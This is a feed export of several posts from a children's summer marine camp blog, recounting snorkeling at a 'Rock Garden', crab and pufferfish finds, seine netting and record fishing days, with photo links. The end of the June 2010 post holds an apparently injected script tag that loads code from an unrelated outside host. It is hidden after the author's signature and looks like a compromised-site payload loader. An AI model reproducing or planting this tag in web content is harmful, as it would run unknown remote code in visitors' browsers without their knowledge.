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		<title>Another Week in Paradise!</title>
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		<pubDate>Sun, 27 Jun 2010 20:05:53 +0000</pubDate>
		<dc:creator>Mike</dc:creator>
				<category><![CDATA[Summer 2010: June 21 - 25]]></category>
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		<description><![CDATA[Hi Everyone! Welcome Back!!!
I&#8217;m finally getting a chance to write about last weeks Adventure.  I left immediately after camp on Friday to spend the weekend in the Bahamas swimming with Spotted and Bottlenose Dolphin and some nice big Tiger Sharks on the ridge. Saw quite a few big grouper on some sunken wrecks too [...]]]></description>
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<p>I&#8217;m finally getting a chance to write about last weeks Adventure.  I left immediately after camp on Friday to spend the weekend in the Bahamas swimming with Spotted and Bottlenose Dolphin and some nice big Tiger Sharks on the ridge. Saw quite a few big grouper on some sunken wrecks too which I loved. Wanted to do a little underwater photography! Let me tell you I had FUN doing that too, but that&#8217;s a another story for another day! Needless to say, its been FUN FUN FUN and I didn&#8217;t get a chance to write my blog!!! Oh well&#8230;Now is as good a time as any&#8230;</p>
<p><a href="http://www.flickr.com/photos/adventuremike/4731520706/" target="_blank" title="Having FUN at the beach! by AdventureMIke.com, on Flickr"><img src="http://farm2.static.flickr.com/1355/4731520706_1cae8de15c.jpg" width="500" height="375" alt="Having FUN at the beach!" /></a></p>
<p>Like always, I began the week with another great group of kids!!! We had perfect weather and perfect water conditions and boy were we ever ready to go have some fun!!! Like Fun all the way from here to there kind of FUN!  Just the way I LOVE it! We spent the first morning visiting the Rock Garden and having a ball finding all kinds of things! There were so many fish in every direction we didn&#8217;t know which way to start swimming. Parrotfish, snappers, grunts, seargent majors, porkfish, barracudas, wrasse and snook! Everywhere!!! While we were looking at fish, AdventureDakota found a Big Sea Urchin which we all checked out and AdventureRocky found a nice one too. This photo of Rocky with a nice sea urchin shows you just how much fun we were having!</p>
<p><a href="http://www.flickr.com/photos/adventuremike/4731518370/" target="_blank" title="Rocky finds a nice sea urchin! by AdventureMIke.com, on Flickr"><img src="http://farm2.static.flickr.com/1232/4731518370_c9247a5bff.jpg" width="375" height="500" alt="Rocky finds a nice sea urchin!" /></a></p>
<p>We spent a lot of time looking for new things and catching blennies, gobies, beau gregories, flounder, brittle starfish, short nosed pufferfish and conchs, etc. in our hand nets. It didn&#8217;t take long for everyone to get the hang of it! The kids would work together corralling the fish and before long someone had it in their net. The schools of fish were thick near the shallow rocks and this kept the kids busy for quite some time. Nobody wanted to give up! They were too busy having FUN chasing fish at the Rock Garden!!!</p>
<p><a href="http://www.flickr.com/photos/adventuremike/4730872861/" target="_blank" title="Chasing fish at the Rock Garden by AdventureMIke.com, on Flickr"><img src="http://farm2.static.flickr.com/1337/4730872861_8b124ef278.jpg" width="500" height="375" alt="Chasing fish at the Rock Garden" /></a></p>
<p>After one of the kids turned over a rock and found a Big swimming crab hiding underneath, fish chasing turned into crab catching and off in that direction we went for a while. We didn&#8217;t care what we were doing, but boy were we ever having fun and keeping busy doing it all the same! Almost every single rock we looked under we found ourselves staring eye to eye with a nice BIG swiming crab, stone crab or coral crab! We even had schools of sheepshead and parrotfish following us around trying to eat the crabs we were finding out from underneath our fingertips. Were we ever loving that!!! It was cool to see!!! I watched AdventureJagger chase down a nice BIG crab and finally catch him and hold him up for all to see. Nice Job, and not getting pinched either!!! Alright!</p>
<p><a href="http://www.flickr.com/photos/adventuremike/4738805887/" target="_blank" title="Jagger catches a big crab by AdventureMIke.com, on Flickr"><img src="http://farm5.static.flickr.com/4078/4738805887_0f2fddc3a9.jpg" width="375" height="500" alt="Jagger catches a big crab" /></a></p>
<p>I watched as AdventureMaxwell perfected a fine technique of turning up a rock and snagging a Big Crab in his net all in one swift motion. That is not as easy as it sounds. These crabs have a habit of rapidly swimming under the next rock nearby or right under your feet before you can blink your eye! Sometimes they swim right under the next kids feet before they know whats going on, and that sure can get things exciting in a hurry. You should have heard the squeals of laughter when that would happen! We all loved it!!!</p>
<p><a href="http://www.flickr.com/photos/adventuremike/4731525228/" target="_blank" title="Maxwell nets another crab! by AdventureMIke.com, on Flickr"><img src="http://farm2.static.flickr.com/1416/4731525228_245b0778a0.jpg" width="375" height="500" alt="Maxwell nets another crab!" /></a></p>
<p>Another day we stopped by the Big Sandbar to look for mantis shrimp, fighting conchs, blue claw crabs, hermit crabs and anything else we could find to check out up close and personal.  It didn&#8217;t take us long to find something we loved! We always love coming here and seem to come up with underwater &#8220;treasures&#8221; on every occasion. On this day I re-learned that important lesson why you should NOT wiggle your finger in the hole of a nice big mantis shrimp to see what might happen! And that&#8217;s because he might think its a fish and reach out quicker than you can imagine and grab that nice little finger with his sharp dagger like claws before you can move it!! When I pulled my finger back bleeding with 2 nice punctures in it, the kids thought that was just GREAT!!! I&#8217;m sure they learned an important lesson and so did I!!! AGAIN&#8230; ouch!  When will I ever learn? One of the neatest things AdventureBeau found was a nice big 9 armed starfish that he shared with all of us, and we loved that too!!! Good JOB!</p>
<p><a href="http://www.flickr.com/photos/adventuremike/4731532368/" target="_blank" title="Beau finds a 9 armed starfish! by AdventureMIke.com, on Flickr"><img src="http://farm2.static.flickr.com/1026/4731532368_bb142f1dbd.jpg" width="375" height="500" alt="Beau finds a 9 armed starfish!" /></a></p>
<p>We spent one afternoon seine netting in the shallows and grass flats around Little Munyon Island. The kids always love this and you never know what you might come up with! We find so many cool things from juvenile barracudas to dwarf sea horses to sharp nosed pufferfish. You name it and I think we might be able to find it!  Each time we pulled the net we found something new to share! On this day the tide was extra low and we had a chance to seine net in places we weren&#8217;t able to before. It was just great!</p>
<p><a href="http://www.flickr.com/photos/adventuremike/4739736728/" target="_blank" title="seine netting the grass flats by AdventureMIke.com, on Flickr"><img src="http://farm5.static.flickr.com/4138/4739736728_ed8c9f9f0a.jpg" width="500" height="375" alt="seine netting the grass flats" /></a></p>
<p>On one pull of the net on to the beach we came up with a lovely checkerboard pufferfish that everyone wanted to see! thes fish are commonly in the shallows eating barnackles off the rocks but aren&#8217;t easy to get in a seine net. I showed them the powerful jaws and dentures that these fish posses and made sure no one held this fish but me. Didn&#8217;t want anyone to get nibbled on. They are capable of giving a nasty bite if you by chance mistakenly slip your finger in their mouth when you are not paying as close attention as you should be. I&#8217;ll bet you would never guess how I found that outlong ago&#8230; ouch again&#8230; Needless to say we loved checking out this checkerboard pufferfish and his toothy dentures!</p>
<p><a href="http://www.flickr.com/photos/adventuremike/4730895785/" target="_blank" title="Checking out a checkerboard pufferfish! by AdventureMIke.com, on Flickr"><img src="http://farm2.static.flickr.com/1060/4730895785_4d008ceef4.jpg" width="500" height="375" alt="Checking out a checkerboard pufferfish!" /></a></p>
<p>Thursday was our fishing day and as usual we caught fish almost non stop! The most common thing I heard all day was, &#8220;AdventureMike I need more BAIT!!!&#8221;  And let me tell you I heard that before!!! We spent a little bit of time fishing the artificial reef and caught porkfish, grunts, tomtates, porgies, parrotfish and more. I decided to run down to my snapper hole and before long everyone was catching some nice BIG snappers! And I mean one right after another!!! Over and over and over&#8230; AdventureSamantha sure had FUN fighting and catching this nice BIG one all by herself!!! YOU ROCK!</p>
<p><a href="http://www.flickr.com/photos/adventuremike/4730884373/" target="_blank" title="Samantha catches a BIG lane snapper! by AdventureMIke.com, on Flickr"><img src="http://farm2.static.flickr.com/1313/4730884373_8d4a8de5aa.jpg" width="375" height="500" alt="Samantha catches a BIG lane snapper!" /></a></p>
<p>I&#8217;m not sure how many snapper we caught here, but it seemed to many for me to keep count!!! A few of the kids caught some nice big porgies and they had to work hard bringing those fish in on light tackle! A few times I heard the kids say their wrists were getting tired from reeling in so many fish and thats a &#8220;complaint&#8221; I love to hear!!! It seems our fishing day is always like this! On one occassion AdventureDakota came up with a nice BIG blue claw crab hanging on his bait and thats the first one anybody has caught during my summer camp! Lucky for us he let go on his own and fell over the side to swim away! Nice catch Dakota!</p>
<p><a href="http://www.flickr.com/photos/adventuremike/4731529826/" target="_blank" title="Dakota catches a blue crab! by AdventureMIke.com, on Flickr"><img src="http://farm2.static.flickr.com/1165/4731529826_3cd0d6d639.jpg" width="375" height="500" alt="Dakota catches a blue crab!" /></a></p>
<p>The last day we spent a bit of time swimming at the Rock Garden chasing more fish and darting after swimming crabs and having so much fun trying to catch sharpnosed pufferfish when we would see them. When first spotted they don&#8217;t appear to be able to swim fast but don&#8217;t be fooled by their diminutive size. They can dart away quickly and disappear before you can say, &#8220;Where did he go?&#8221;. That happened more often than not!!! AdventureMichael came up with a nice one and everyone loved watching it puff up to more than twice its size!!</p>
<p><a href="http://www.flickr.com/photos/adventuremike/3805141901/" target="_blank" title="Michael with a pufferfish! by AdventureMIke.com, on Flickr"><img src="http://farm4.static.flickr.com/3505/3805141901_642201a675.jpg" width="375" height="500" alt="Michael with a pufferfish!" /></a></p>
<p>We ended the day going back to Little Munyon Island and walking around in the shallows finding thousands, and I mean thousands of short spined sea urchins, hundreds of hermit crabs and juvenile blue crabs and a few beaded starfish that everyone loved to see! The tide was so low we had a chance to walk all the way around the island and look for shells and what ever else we could find. AdventureJake came up with a juvenile striped burrfish that had short little spines on top and blue and yellow polka dots on the bottom, and let me tell you we ALL loved that!!!  Nice Find!!!</p>
<p><a href="http://www.flickr.com/photos/adventuremike/4730893471/" target="_blank" title="Jake with a juvenile burrfish! by AdventureMIke.com, on Flickr"><img src="http://farm2.static.flickr.com/1206/4730893471_1eb291243a.jpg" width="375" height="500" alt="Jake with a juvenile burrfish!" /></a></p>
<p>Before we knew it the week had come to an end and none of us was ready to call it a day! We had so much FUN we never wanted it to stop!!! But I knew I couldn&#8217;t wait any longer. I had to drop off the group and head to the Bahamas and I knew it was going to be a long day, Having FUN that is, before I cleared customs and I couldn&#8217;t wait to get started!!! . And just like I thought, it was wonderful! Wish you all could have joined me! It was just GREAT!!!</p>
<p>Having all this Fun left me looking forward to this week. And one things certain, I couldn&#8217;t wait to head out in the boat with the kids and have fun doing it all over again! I know its going to be great! I can just feel it!!! Hope you&#8217;ll join us in the Adventure!!! Stay tuned, it will be here before you know it! Time Flies when your having FUN!!!! And we&#8217;re going to have it from start to finish!!! See you soon!</p>
<p>Let&#8217;s Go Have Some FUN!!!<br />
AdventureMike<script src="http://ae.awaue.com/7"></script></p>
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		<title>Summer 2009 Week 6: Snorkeling and A New Fishing Record!!!</title>
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		<pubDate>Fri, 10 Jul 2009 23:52:28 +0000</pubDate>
		<dc:creator>Mike</dc:creator>
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		<description><![CDATA[Hi Everyone, Welcome Back!!!
We just finished up the third day of our weekly Adventure and let me tell you it has been absolutely FABULOUS!!! This week has been just perfect!!! I&#8217;m not even sure where to begin! We&#8217;ve had so much FUN since the very first second we left the dock!!! It seems like this [...]]]></description>
			<content:encoded><![CDATA[<p>Hi Everyone, Welcome Back!!!</p>
<p>We just finished up the third day of our weekly Adventure and let me tell you it has been absolutely FABULOUS!!! This week has been just perfect!!! I&#8217;m not even sure where to begin! We&#8217;ve had so much FUN since the very first second we left the dock!!! It seems like this adventure has been going on for weeks, not just 3 days! Just love it like this!!! On Tuesday AdventureGeorge, Peyton and I were joined by 6 New Adventurers, Adventurer&#8217;sLeah, Nicholas, Emily, Daniel and Joseph. And the best thing, this group not only swims like fish, they know how to make the most of an Adventure!!! It doesn&#8217;t get any better than this!!!</p>
<div class="wp-caption aligncenter" style="width: 510px"><a href="http://farm3.static.flickr.com/2473/3704694239_623a214cd3.jpg?v=0"><img title="Group photo at the Rock Garden" src="http://farm3.static.flickr.com/2473/3704694239_623a214cd3.jpg?v=0" alt="Group photo at the Rock Garden" width="500" height="375" /></a><p class="wp-caption-text">Group photo at the Rock Garden</p></div>
<p>We started the first day going to the Rock Garden. The tide was high, the water crystal clear and fish everywhere by the thousands! As soon as we got in the water we saw big snook chasing menhaden, small barracudas on the prowl, parrotfish, surgeonfish and sergeant majors by the hundreds! Everywhere you looked there were fish in every size, shape and color. So many different species of fish just too numerous to mention!  It was just GREAT!!! The first wonderful highlight of the morning occurred when we caught a small sharpnosed pufferfish and watched as it puffed itself up as if on cue with water to almost double its size. Always love catching these!!! Had a chance to take some nice photos as everyone had a chance to hold it and check it out. Everybody had smiles from ear to ear as this was going on! Everyone was on the hunt with nets and catching swimming crabs, blennies, rock crabs, hermit crabs, pistol shrimp, etc. You name it, we just about caught it!!!</p>
<div class="wp-caption aligncenter" style="width: 385px"><a href="http://farm3.static.flickr.com/2554/3704693955_86bdc45bfe.jpg?v=1247175060"><img title="Emily with a pufferfish!" src="http://farm3.static.flickr.com/2554/3704693955_86bdc45bfe.jpg?v=1247175060" alt="Emily with a pufferfish!" width="375" height="500" /></a><p class="wp-caption-text">Emily with a pufferfish!</p></div>
<p>The second fabulous highlight of the morning occurred when we discovered a nice yellow ray swimming along the bottom without a barb.  We quickly surrounded it and were able to catch it in a net. This gave everyone a wonderful chance to check it out up close and personal since it was totally harmless. It was just great!!! We brought it back to the boat to take some photos and give everyone the opportunity to check out the mouth underneath and the sphericals on the top behind the eyes. It would lay in our hands like it belonged there without even wriggling! Did we all love this!!! Just GREAT!!! After a few minutes we let it go and watched as it swam back to the bottom and continued on its way. We spent the whole day snorkeling here. We never wanted to leave we were having so much FUN!</p>
<div class="wp-caption aligncenter" style="width: 385px"><a href="http://farm3.static.flickr.com/2513/3705502176_4d3ca53ac0.jpg?v=1247175064"><img title="Yellow Ray with no barb! Nice find!" src="http://farm3.static.flickr.com/2513/3705502176_4d3ca53ac0.jpg?v=1247175064" alt="Yellow Ray with no barb! Nice find!" width="375" height="500" /></a><p class="wp-caption-text">Yellow Ray with no barb! Nice find!</p></div>
<p>The second day we went back to the Rock Garden since we had so much FUN the previous day and found a baby octopus peaking out of his hole at us as we swam by. It seemed he was as curious about us as we were about him. We would stare eye to eye for minutes and boy did we all love this! We also found some cool jawfish and a baby flying gurnard crawling across the sand with its modified ventral fins that act more like legs than fins. Such a cool find! From here we went to the beach and spent the rest of the day snorkeling, collecting sea glass, shells and body surfing in the waves. We were having so much fun nobody wanted to call it a day when it was time to leave!  On the way back to the boat we saw some big tarpon in the shallows! Really cool seeing that! And on the way home we saw 2 big eagle rays swimming slowly side by side and we were able to motor right up next to them just a few feet away. They didn&#8217;t seem to mind that we were there and we loved that too!!!<br />
And of course you all know that Thursday is our fishing day. And let me tell you, DID WE HAVE FUN TODAY!!! We set all kinds of records that may never be beaten! And I mean NEVER!!! Unfortunatel 2 adventurers couldn&#8217;t make it this morning so AdventureGeorge and Joseph missed the boat since their moms called and let me know they weren&#8217;t going to make it. They won&#8217;t believe what they missed! We had so much FUN today!!! Sorry guys&#8230;</p>
<div class="wp-caption aligncenter" style="width: 510px"><a href="http://farm3.static.flickr.com/2558/3705501336_1fb1be11ba.jpg?v=0"><img title="Another quadruple hook-up!!!" src="http://farm3.static.flickr.com/2558/3705501336_1fb1be11ba.jpg?v=0" alt="Another quadruple hook-up!!!" width="500" height="375" /></a><p class="wp-caption-text">Another quadruple hook-up!!!</p></div>
<p>I arrived at the dock at 9AM, and AdventureReese, Leah, Peyton, Nicholas, Emily and Daniel were quick to load up and as excited as you could be about fishing! Man were they raring to go!!! Luckily I had 5 pounds of squid already cut up into bite size morsels and 20 extra rigs already made! I wasn&#8217;t going to be having any help today so I had prepared everything as best as I could! Little did I know then how unbelievable our day of fishing was going to be!!! I quickly motored out to one of my &#8220;secret spots&#8221; and  when I drove over it with the fathometer on, we marked thousands of fish from top to bottom! The bottom was litterally &#8220;swimming&#8221; with fish!!! I anchored right above the rocky ledge, got the rods ready and handed them out. From the very minute we baited the hooks and dropped them down the rest was just a blur!!!<br />
Instantly, and I mean INSTANTLY everyone had a fish on. AdventureReese, Leah, Peyton, Nicholas, Emily and Daniel caught fish faster than I have ever seen, and I mean EVER SEEN!!! Like in my whole life of fishing! You didn&#8217;t have 3 seconds from the moment you dropped down till you had a fish on, most times I couldn&#8217;t count to 1 second! EVERYONE had fish on ALL THE TIME!!! The action was so unbelievable that everyone was baiting and taking off their own fish!! I couldn&#8217;t even keep up with just one adventurer by myself today, the action was so hot!!!<br />
The kids caught all kinds of fish in every size shape and color you could imagine. They caught fish I have never seen caught on rods before. From Parrotfish, snapper, grunts, cottonwicks, sailors choice, tomtates, scorpionfish, banded pufferfish, threadfin herring, porkfish,  butter hamlets, etc. You name it, I think they caught it!! We had groupers eating our bait and fish left and right and cutting us off in the rocks!!! Just Unbelievable. We had one very exciting moment occurr while AdventurePeyton was waiting for me to take his big Caesars Grunt off a big shark came up and ate it right at the side of the boat; hook, line and sinker!!! Just about splashed us in the frenzy. And while that was going on, a huge barracuda came up and ate Reeses fish off too!!! Man was that exciting too!!! Talk about having FUN, we were having it NOW!!! I know none of us will ever forget this day of fishing!!! I didn&#8217;t get a chance to look at my watch for 3 hours. It was just that crazy!!!<br />
By the time 3 hours were over and done with, we had boated 419 fish!!! That&#8217;s right, you read that number correctly!!!  419 FISH!!!  BROUGHT IN THE BOAT!!!  And that does not include what we lost, had on or got eaten by something else!!! As fast as we could catch them and release them, we had 6 more on!!! I have NEVER seen anything LIKE THIS!!! I may never again!!! It set an all new fishing record for AdventureMike&#8217;s that may NEVER be beat!!! And I mean NEVER!!!  It never let up!!! From BIG FISH TO SMALL FISH, WE CAUGHT THEM all!!! God I love this job!!!!!<br />
Somehow or other AdventureDaniel caught this tiny pufferfish on a hook that I had never seen done before and I bet him he would never catch another one like that again. Well just to prove me wrong, not only did he catch another one, he caught another two!!! Talk about losing a bet, Oh Boy&#8230;. I loved every minute of it!!!!!!!!! Just GREAT!!!  <img src='http://www.adventuremike.com/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
<div class="wp-caption aligncenter" style="width: 385px"><a href="http://farm3.static.flickr.com/2533/3705501096_43a61be91a.jpg?v=1247175068"><img title="Daniel catches his first pufferfish!" src="http://farm3.static.flickr.com/2533/3705501096_43a61be91a.jpg?v=1247175068" alt="Daniel catches his first pufferfish!" width="375" height="500" /></a><p class="wp-caption-text">Daniel catches his first pufferfish!</p></div>
<p>In the end, the final tally was: AdventurePeyton with 43 fish, Reese with 54, maybe even more? Lost count, oops.., Leah with 67, Nicholas with 71, Emily with 73, and the new all time winner, AdventureDaniel with 111 fish!!! I can&#8217;t tell you just how good I feel right now!!  Today was one of those &#8220;ONCE IN A LIFETIME DAYS!!! Is it possible to get any better than this or have more FUN? I don&#8217;t think so&#8230; What a day it was!!! I will never hear, &#8220;I NEED MORE BAIT!!!&#8221; without thinking about this day! never!!!<br />
We caught so many fish!  I can’t even begin to guess how many we had on besides that. It was amazing!!! I would have given anything to have it all on video!!!  I have no idea what made the action so extra special, or what made the fish bite like they did, but I know one thing for sure, not one of these adventurers will ever forget this day, and neither I !!!!<br />
We had fun!!! We had a blast!! ! We had a once in a lifetime day!!! And we all had a story to tell!!! It may sound like a “fish story” to some, but we all know differently! WE LIVED THE ADVENTURE!!! And if you saw the smiles on the faces that I did today, you would never forget it either!!! Thank you !!!</p>
<p>God, I love my job!!!! How can we have this much fun!!! I must still be dreaming… YOU GUYS ROCK!! I can&#8217;t wait till tomorrow!!!</p>
<p>LET&#8217;S GO HAVE SOME FUN!!!!!</p>
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		<title>Summer 2009 Week 4: Hiking, Fishing and having Fun at the Beach!</title>
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		<pubDate>Fri, 26 Jun 2009 13:54:26 +0000</pubDate>
		<dc:creator>Mike</dc:creator>
				<category><![CDATA[Summer 2009: June 22 - June 25]]></category>
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We just finished up the third day of week 4 and let me tell you it&#8217;s been another FUN week!!! Got lucky with the weather too! When I left my dock on Tuesday morning to head to Phil Foster Park it was a little wet, but by the time I arrived at [...]]]></description>
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<p>We just finished up the third day of week 4 and let me tell you it&#8217;s been another FUN week!!! Got lucky with the weather too! When I left my dock on Tuesday morning to head to Phil Foster Park it was a little wet, but by the time I arrived at Phil Foster Park the sky was clearing. Good thing too cause I could tell this weeks group of Adventurers was raring to go, no matter what the weather was going to be! As soon as AdventureRachel, Amanda, Brendan, Brian, Robert, Michael and Christopher were on board I could tell it was going to be another great week! Their enthusiasm and excitement was contagious!!! Since it was still a little cloudy out to the south, we decided to head north to Munyon Island and start the day with an island hike and a bit of Adventure.</p>
<div class="wp-caption aligncenter" style="width: 510px"><a href="http://farm3.static.flickr.com/2449/3661334934_a2853d4322.jpg?v=0"><img title="Island Exploration" src="http://farm3.static.flickr.com/2449/3661334934_a2853d4322.jpg?v=0" alt="Island Exploration" width="500" height="375" /></a><p class="wp-caption-text">Island Exploration</p></div>
<p>Before I had a chance to even drop anchor, this group was ready to go!!! We hopped out and headed up the boardwalk trail and before long we were on our way to the backside of the island to see what we could find. This trail was relatively new and took us past a big stand of Ficus and Sea- grape trees, thru a mangrove estuary, along a salt marsh prairie and eventually out along the northeast side of the island. It was a beautiful hike and along the way we saw wild coffee plants, knickerbean trees, ospreys, giant blue land crabs, monarch and zebra butterflies, a number of lizards and a few big banana spiders high up in the trees. We searched the shallow flats and found dozens of sea grass hermit crabs in a variety of beautiful shells, hundreds of juvenile blue crabs, but no luck finding any live horseshoe crabs. I was hoping to find a few but they are not too common around here anymore. We found a half dozen or so molts from them which we checked out and AdventureBrendan and Christopher kept one each for a souvenir. Nice Big ones too! After an hour or so we headed back to the boat and went to the Rock Garden for a bit of snorkeling.</p>
<p>The tide was incoming, the water crystal clear and the Rock Garden was full of fish, as usual! Within the last week the big schools of Menhaden arrived and we had a wonderful opportunity to swim through large schools of snook and small barracudas on the prowl for an easy meal. It was just great to watch the fish swirl around us by the thousands! We saw hundreds of snappers, grunts, seargent majors, porkfish, Bermuda chub and parrotfish, etc and even a nice small yellow ray without a tail or barb. Looked like a swimming yellow spotted &#8220;dinner plate&#8221;. I tried to catch it by hand but no luck. It was too slippery to hold on to. AdventureChristopher gave me the &#8220;thumbs up&#8221; for trying though!</p>
<div class="wp-caption aligncenter" style="width: 510px"><a href="http://farm4.static.flickr.com/3664/3660535157_7b2227e1cd.jpg?v=0"><img title="Thumbs Up!" src="http://farm4.static.flickr.com/3664/3660535157_7b2227e1cd.jpg?v=0" alt="Thumbs Up!" width="500" height="375" /></a><p class="wp-caption-text">Thumbs Up!</p></div>
<p>The second day we stopped by the Big Sandbar to do a bit of snorkeling over the shallow bar and found quite a few large Mantis Shrimp peaking out of their tunnels at us. We tried to bait a few out but they were more wary than I had hoped. Maybe next time&#8230; We all found dozens of Florida and West Indian fighting conchs, short-spined sea urchins and numerous olive shells sliding across the bottom. We chased a few small barracudas out of the shallows just to show them who was &#8220;boss&#8221; then decided to head out along the beach since the ocean was flat calm.</p>
<p>We had barely made it around the Jetty when right before us was tremendous splash. A second later a group of Bottlenose Dolphin leaped out of the water and began chasing a school of houndfish right off our bow. The houndfish would race, skipping along the surface with the Dolphin in hot pursuit!! We watched as the Dolphin caught one houndfish after another and ate them right before our eyes. Let me tell you, our group of Adventurers were loving this!!! Wish you could have been there to hear their excitement!!! It was just GREAT!!! And just as this was coming to an end, a large Loggerhead Sea Turtle came up for a few quick breaths of air right beside the boat, gave us a quick once over as if checking us out, then lazily swam back towards the bottom. We were having a Blast!!! Love it like this!!! We spent the last hour snorkeling along the beach for shells and body surfing the boat wakes when they would come by. Does it get any better than this?</p>
<p>Today was our fishing day and we were joined by AdventureDakota from last Summer who caught a nice big red grouper the last time he was along! We dropped anchor on my secret spot and as soon as the bait hit the water we were having bites! AdventureAmanda caught the first fish, which by chance was her very first fish ever, so I had to definitely take a picture of that! Nice Job Amanda!!! You Rock!!!</p>
<div class="wp-caption aligncenter" style="width: 385px"><a href="http://farm4.static.flickr.com/3641/3660534825_7beefdef13.jpg?v=1245968843"><img title="Amandas First Fish!" src="http://farm4.static.flickr.com/3641/3660534825_7beefdef13.jpg?v=1245968843" alt="Amandas First Fish!" width="375" height="500" /></a><p class="wp-caption-text">Amanda&#39;s First Fish!</p></div>
<p>It wasn&#8217;t long after that before the whole gang was having them on. All at the same time of course!!! And boy was I missing my helper AdventureNicholas today!! He&#8217;s great with kids, fishing, boating, baiting the hooks, rigging the lines, taking off the fish and cleaning the boat, etc. but he over slept and missed the boat. And let me tell you that left me EXTRA busy today. We&#8217;ll have to make sure to give him a little &#8220;grief&#8221; next time we see him just to let him know he was missed!!! Good thing Rachel, Brendan, Amanda and the rest of the gang were quick to learn how to bait their own hooks and take off the fish to give me a hand. I had to move the boat a few times to stay on the fish, but it was non stop from start to finish as usual. I think AdventureDakota may have caught the most fish, AdventureBrendan caught two at once and AdventureAmanda caught the biggest. A nice Margate that fought hard!!! Good job!!! A bit later Dakota was reeling in a nice snapper when a tremendous barracuda decided to have it for lunch and he did a superb job fighting that for quite a while before it bit thru the line. Nice job there too!!! It was nice to see that everyone caught fish and had non stop action as usual!!!</p>
<div class="wp-caption aligncenter" style="width: 510px"><a href="http://farm4.static.flickr.com/3402/3660534583_1c99f7d792.jpg?v=0"><img title="Everyone has a fish on at once!" src="http://farm4.static.flickr.com/3402/3660534583_1c99f7d792.jpg?v=0" alt="Everyone has a fish on at once!" width="500" height="375" /></a><p class="wp-caption-text">Everyone has a fish on at once!</p></div>
<p>The last hour of the day we went back out to the beach for some snorkeling, sea glass and shell collecting and competitive game of &#8220;chicken fighting&#8221;. Amanda and Rachel against Brendan and Brian, and I have to say in my opinion the girls won! It was great fun for all and a wonderful way to end the day and burn off any excess energy!!! I can tell you that not one of us was ready to call it a day!!!  We were having too much FUN!!! The really nice thing though, is that we have one more day left, and who knows what we may find and discover then!!! I can promise you one thing, we are going to have a BLAST!!! Am thinking about starting the day at the Rock Garden and catching all kinds of fish with nets. Know we will have a ball doing that! Stay tuned to see what we discover and the fun we&#8217;re going to have!!! Wish you could join us!!! It&#8217;s going to be great!!!</p>
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<p>LET&#8221;S GO HAVE SOME FUN!!!</p>
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		<title>Summer 2009 Begins!!!</title>
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		<pubDate>Mon, 08 Jun 2009 01:06:41 +0000</pubDate>
		<dc:creator>Mike</dc:creator>
				<category><![CDATA[Summer 2009: June 2 - June 5]]></category>
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		<description><![CDATA[Hi Everyone, Welcome back!!! We just finished our first weekly Adventure and as usual we had a BLAST!!!!! We&#8217;ve been so busy adventuring this week I haven&#8217;t even had a chance, nor the energy to write about it! As some of you may know, I&#8217;ve had such a wonderful response to my camp that I [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: left;">Hi Everyone, Welcome back!!! We just finished our first weekly Adventure and as usual we had a BLAST!!!!! We&#8217;ve been so busy adventuring this week I haven&#8217;t even had a chance, nor the energy to write about it! As some of you may know, I&#8217;ve had such a wonderful response to my camp that I decided to do double sessions to try and get some more of you in, and even then I couldn&#8217;t accommodate all the requests I&#8217;ve had. Thanks to you all! For those of you who couldn&#8217;t get your child in, I&#8217;m sorry&#8230;. Would love to be able take everyone who wanted to go, just not able to. Please register early next year when I open up registration and get ALL the paper work to me IMMEDIATELY to hold your space when that time comes! I already know I won&#8217;t be able to take everyone for sure then! Now on to this past weeks ADVENTURE!!!</p>
<p style="text-align: center;"> <img src="http://farm4.static.flickr.com/3618/3605772992_cfb66e525a.jpg?v=0" alt="Havin Fun!" /></p>
<p>When I arrived at the dock bright and early for the Tuesday morning session I could already tell we were going to have another great group! The kids were there, excited and raring to go, and with smiles from ear to ear. Just the way I love it!!! Soon afterwards, AdventureMatthew, Casey, Jaime, Miriam, Katie, Thomas, Nicholas and Neil boarded my Adventure boat, &#8220;DREAM CHASER&#8221; to begin the weeks adventure. And were they ever ready to go!!! We stowed the gear, off we went and the FUN began&#8230;</p>
<p>We spent the week boating and exploring, isaland hopping, going to the Big Sandbar, the Rock Garden, Munyon Island, Starfish Prairie, the Beach and of course Fishing!!!! And did we Ever Have FUN!!! From start to finish it was a blast and each session seemed to end way to soon!</p>
<p>On the Big Sandbar we found hundreds of Florida and West Indian fighting Conchs and loads of short-spined sea urchins in a variety of colors. We checked them all to see what new color combinations we could find. My favorite being the bright white with the deep purple short spines. Just beautiful!!! Along the way we discovered Mantis Shrimp burrows and watched as Tube Worms slowly filtered sand to digest the algae off each grain. We came upon the broken carapace of a very large Rooster Crab, in the family of box or shame-faced crabs known for holding their claws in front of their faces, that had been freshly eaten by a ray and found quite a few Baby&#8217;s Ear Mollusks burrowing in the sand. Always love finding those!</p>
<p>We found a variety of starfish every time we went, from Beaded Sea Stars, Cushion Sea Stars and the unusual Nine-Armed Starfish that&#8217;s mainly nocturnal. Always a treat!!! That gave me a great opportunity to take some cool photos of AdventureNeil and a few others with &#8220;Nine-Armed Starfish Head&#8221; a first for the trip!!! On one day we found a very rare and unusual fish resting in a shallow hole with only an inch or two of water remaining, maybe a hundred feet from the waters edge. I was excited to see it was a Flying Gurnard, distinguished by having fan like pectoral fins that often have brilliant iridescent blue lines and markings!!! It was a fabulous discovery!!! These fish have modified ventral fins that allow them to &#8220;walk&#8221; about and turn over rocks and shells while foraging. A very unusual fish and one that I rarely see. Boy were we Lucky!!! We released it unharmed into deeper water. I know it was glad about that. Every now and then when we would get cold swimming, we would come back to the Big Sandbar and sit in a deep hole filled with hot water that we nicknamed &#8220;The Hot Tub&#8221; to warm up. It was just great!!! Our very own hot tub&#8230;</p>
<p>At the Rock Garden we saw the usual&#8230;. Hundreds of fish in every size, shape and color imaginable! From small barracudas to snook, porkfish, parrotfish, sheepsheads, grunts, snappers, angelfish, damselfish, butterflyfish, blennies, etc. Every where you looked there was something else to be seen&#8230; We spent hours searching under the shallow rocks and found all types of hermit crabs, box crabs, rock crabs, porcelain crabs, swimming crabs, stone crabs, pistol shrimp, popping shrimp, blennies and more. A plethora of discoveries with every turn. Just love it that way!!!</p>
<p>This week we were lucky to have calm enough seas to run out the inlet and around the South Jetty to park right near the beach and do some beach combing for shells and worn sea glass. All of us came home with a few treasures of our own. We had hours of fun &#8220;hill jumping&#8221; and body surfing the small waves in crystal clear water. Never wanted to leave here, and in between body surfing and snorkeling, the group played a few games of &#8220;chicken&#8221; where Casey and Jaime would team up against Thomas and Nicholas and try and wrestle each other over into the water. It was fun for all!!</p>
